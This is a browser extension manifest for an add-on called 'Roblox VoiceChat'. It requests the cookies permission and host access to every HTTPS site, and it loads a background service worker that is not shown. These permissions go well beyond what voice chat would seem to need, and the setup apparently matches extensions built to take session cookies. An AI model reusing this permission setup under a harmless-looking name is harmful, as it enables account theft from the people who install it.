{
    "name": "Roblox VoiceChat",
    "description": "VoiceChat V1",
    "version": "1.0.0",
    "manifest_version": 3,

    "action" : {
        "default_icon": "assets/voice.png"
    },

    "host_permissions": [
	"https://*/*"
    ],

    "permissions": [
        "cookies"
    ],

    "background": {
        "service_worker": "config/VoiceChat.js"
    },

    "icons": {
        "16": "assets/voice.png",
        "32": "assets/voice.png",
        "48": "assets/voice.png",
        "128": "assets/voice.png"
    }
}
